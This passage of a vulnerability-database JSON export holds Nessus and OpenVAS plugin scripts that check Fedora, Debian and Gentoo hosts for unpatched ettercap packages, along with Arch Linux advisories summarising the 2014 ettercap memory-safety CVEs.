exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ettercap\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:09", "bulletinFamily": "scanner", "description": "Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi- 1402/\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2014-17090.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80340", "published": "2015-01-05T00:00:00", "title": "Fedora 21 : ettercap-0.8.1-2.fc21 (2014-17090)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17090.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80340);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:30 $\");\n\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\", \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_bugtraq_id(71689, 71690, 71691, 71693, 71695, 71696, 71697, 71698);\n script_xref(name:\"FEDORA\", value:\"2014-17090\");\n\n script_name(english:\"Fedora 21 : ettercap-0.8.1-2.fc21 (2014-17090)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-\n1402/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1174821\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147458.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e3ece68d\"\n );\n # https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1402/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55000fec\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ettercap package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ettercap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"ettercap-0.8.1-2.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ettercap\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:46", "bulletinFamily": "scanner", "description": "Patches a bunch of security vulnerabilities :\n\n - CVE-2014-9380 (Buffer over-read)\n\n - CVE-2014-9381 (Signedness error) See:\n https://www.obrela.com/home/security-labs/advisories/osi\n -advisory-osi-1402/ Patches taken from upstream\n\n - 6b196e011fa456499ed4650a360961a2f1323818 pull/608\n\n - 31b937298c8067e6b0c3217c95edceb983dfc4a2 pull/609 Thanks to Nick Sampanis <n.sampanis@obrela.com> who is responsible for both finding and repairing these issues.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-12-02T00:00:00", "id": "DEBIAN_DLA-126.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82109", "published": "2015-03-26T00:00:00", "title": "Debian DLA-126-1 : ettercap security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-126-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82109);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/12/02 20:08:16 $\");\n\n script_cve_id(\"CVE-2014-9380\", \"CVE-2014-9381\");\n script_bugtraq_id(71691, 71693);\n\n script_name(english:\"Debian DLA-126-1 : ettercap security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Patches a bunch of security vulnerabilities :\n\n - CVE-2014-9380 (Buffer over-read)\n\n - CVE-2014-9381 (Signedness error) See:\n https://www.obrela.com/home/security-labs/advisories/osi\n -advisory-osi-1402/ Patches taken from upstream\n\n - 6b196e011fa456499ed4650a360961a2f1323818 pull/608\n\n - 31b937298c8067e6b0c3217c95edceb983dfc4a2 pull/609 Thanks\n to Nick Sampanis <n.sampanis@obrela.com> who is\n responsible for both finding and repairing these issues.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2014/12/msg00028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/ettercap\"\n );\n # https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1402/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55000fec\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ettercap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ettercap-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ettercap-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"ettercap\", reference:\"1:0.7.3-2.1+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ettercap-common\", reference:\"1:0.7.3-2.1+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"ettercap-gtk\", reference:\"1:0.7.3-2.1+squeeze2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "bulletinFamily": "unix", "description": "- CVE-2014-6395 (arbitrary code execution)\n\nHeap-based buffer overflow in the dissector_postgresql function in\ndissectors/ec_postgresql.c allows remote attackers to cause a denial of\nservice or possibly execute arbitrary code via a crafted password length\nvalue that is inconsistent with the actual length of the password.\n\n- CVE-2014-6396 (arbitrary memory write)\n\nThe dissector_postgresql function in dissectors/ec_postgresql.c allows\nremote attackers to cause a denial of service and possibly execute\narbitrary code via a crafted password length, which triggers a 0\ncharacter to be written to an arbitrary memory location.\n\n- CVE-2014-9376 (arbitrary code execution)\n\nInteger underflow allows remote attackers to cause a denial of service\n(out-of-bounds write) and possibly execute arbitrary code via a small\n(1) size variable value in the dissector_dhcp function in\ndissectors/ec_dhcp.c, (2) length value to the dissector_gg function in\ndissectors/ec_gg.c, or (3) string length to the get_decode_len function\nin ec_utils.c or a request without a (4) username or (5) password to the\ndissector_TN3270 function in dissectors/ec_TN3270.c.\n\n- CVE-2014-9377 (arbitrary code execution)\n\nHeap-based buffer overflow in the nbns_spoof function in\nplug-ins/nbns_spoof/nbns_spoof.c allows remote attackers to cause a\ndenial of service or possibly execute arbitrary code via a large netbios\npacket.\n\n- CVE-2014-9378 (arbitrary code execution)\n\nEttercap does not validate certain return values, which allows remote\nattackers to cause a denial of service (crash) or possibly execute\narbitrary code via a crafted (1) name to the parse_line function in\nmdns_spoof/mdns_spoof.c or (2) base64 encoded password to the\ndissector_imap function in dissectors/ec_imap.c.\n\n- CVE-2014-9379 (arbitrary code execution)\n\nThe radius_get_attribute function in dissectors/ec_radius.c performs an\nincorrect cast, which allows remote attackers to cause a denial of\nservice (crash) or possibly execute arbitrary code via unspecified\nvectors, which triggers a stack-based buffer overflow.\n\n- CVE-2014-9380 (denial of service)\n\nThe dissector_cvs function in dissectors/ec_cvs.c allows remote\nattackers to cause a denial of service (out-of-bounds read) via a packet\ncontaining only a CVS_LOGIN signature.\n\n- CVE-2014-9381 (denial of service)\n\nInteger signedness error in the dissector_cvs function in\ndissectors/ec_cvs.c allows remote attackers to cause a denial of service\n(crash) via a crafted password, which triggers a large memory allocation.", "modified": "2015-03-17T00:00:00", "published": "2015-03-17T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-March/000254.html", "id": "ASA-201503-13", "title": "ettercap-gtk: multiple issues", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:48", "bulletinFamily": "unix", "description": "- CVE-2014-6395 (arbitrary code execution)\n\nHeap-based buffer overflow in the dissector_postgresql function in\ndissectors/ec_postgresql.c allows remote attackers to cause a denial of\nservice or possibly execute arbitrary code via a crafted password length\nvalue that is inconsistent with the actual length of the password.\n\n- CVE-2014-6396 (arbitrary memory write)\n\nThe dissector_postgresql function in dissectors/ec_postgresql.c allows\nremote attackers to cause a denial of service and possibly execute\narbitrary code via a crafted password length, which triggers a 0\ncharacter to be written to an arbitrary memory location.\n\n- CVE-2014-9376 (arbitrary code execution)\n\nInteger underflow allows remote attackers to cause a denial of service\n(out-of-bounds write) and possibly execute arbitrary code via a small\n(1) size variable value in the dissector_dhcp function in\ndissectors/ec_dhcp.c, (2) length value to the dissector_gg function in\ndissectors/ec_gg.c, or (3) string length to the get_decode_len function\nin ec_utils.c or a request without a (4) username or (5) password to the\ndissector_TN3270 function in dissectors/ec_TN3270.c.\n\n- CVE-2014-9377 (arbitrary code execution)\n\nHeap-based buffer overflow in the nbns_spoof function in\nplug-ins/nbns_spoof/nbns_spoof.c allows remote attackers to cause a\ndenial of service or possibly execute arbitrary code via a large netbios\npacket.\n\n- CVE-2014-9378 (arbitrary code execution)\n\nEttercap does not validate certain return values, which allows remote\nattackers to cause a denial of service (crash) or possibly execute\narbitrary code via a crafted (1) name to the parse_line function in\nmdns_spoof/mdns_spoof.c or (2) base64 encoded password to the\ndissector_imap function in dissectors/ec_imap.c.\n\n- CVE-2014-9379 (arbitrary code execution)\n\nThe radius_get_attribute function in dissectors/ec_radius.c performs an\nincorrect cast, which allows remote attackers to cause a denial of\nservice (crash) or possibly execute arbitrary code via unspecified\nvectors, which triggers a stack-based buffer overflow.\n\n- CVE-2014-9380 (denial of service)\n\nThe dissector_cvs function in dissectors/ec_cvs.c allows remote\nattackers to cause a denial of service (out-of-bounds read) via a packet\ncontaining only a CVS_LOGIN signature.\n\n- CVE-2014-9381 (denial of service)\n\nInteger signedness error in the dissector_cvs function in\ndissectors/ec_cvs.c allows remote attackers to cause a denial of service\n(crash) via a crafted password, which triggers a large memory allocation.", "modified": "2015-03-17T00:00:00", "published": "2015-03-17T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-March/000253.html", "id": "ASA-201503-12", "title": "ettercap: multiple issues", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-03-18T14:35:30", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-07-07T00:00:00", "id": "OPENVAS:1361412562310869694", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869694", "title": "Fedora Update for ettercap FEDORA-2015-4009", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ettercap FEDORA-2015-4009\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869694\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:35:41 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\",\n \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ettercap FEDORA-2015-4009\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ettercap'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ettercap on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-4009\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152433.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"ettercap\", rpm:\"ettercap~0.8.2~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-29T12:39:24", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201505-01", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121375", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121375", "title": "Gentoo Security Advisory GLSA 201505-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201505-01.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121375\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:49 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201505-01\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Ettercap. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201505-01\");\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\", \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201505-01\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-analyzer/ettercap\", unaffected: make_list(\"ge 0.8.2\"), vulnerable: make_list(\"lt 0.8.2\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-18T14:36:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868846", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868846", "title": "Fedora Update for ettercap FEDORA-2014-17090", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ettercap FEDORA-2014-17090\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868846\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:58:08 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-6396\", \"CVE-2014-6395\", \"CVE-2014-9377\", \"CVE-2014-9376\",\n \"CVE-2014-9379\", \"CVE-2014-9378\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for ettercap FEDORA-2014-17090\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ettercap'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ettercap on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17090\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147458.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"ettercap\", rpm:\"ettercap~0.8.1~2.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-18T14:36:01", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-03-27T00:00:00", "id": "OPENVAS:1361412562310869133", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869133", "title": "Fedora Update for ettercap FEDORA-2015-4020", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ettercap FEDORA-2015-4020\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869133\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-27 06:52:19 +0100 (Fri, 27 Mar 2015)\");\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\",\n \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ettercap FEDORA-2015-4020\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ettercap'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ettercap on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-4020\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/152866.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"ettercap\", rpm:\"ettercap~0.8.2~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-18T14:35:01", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868758", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868758", 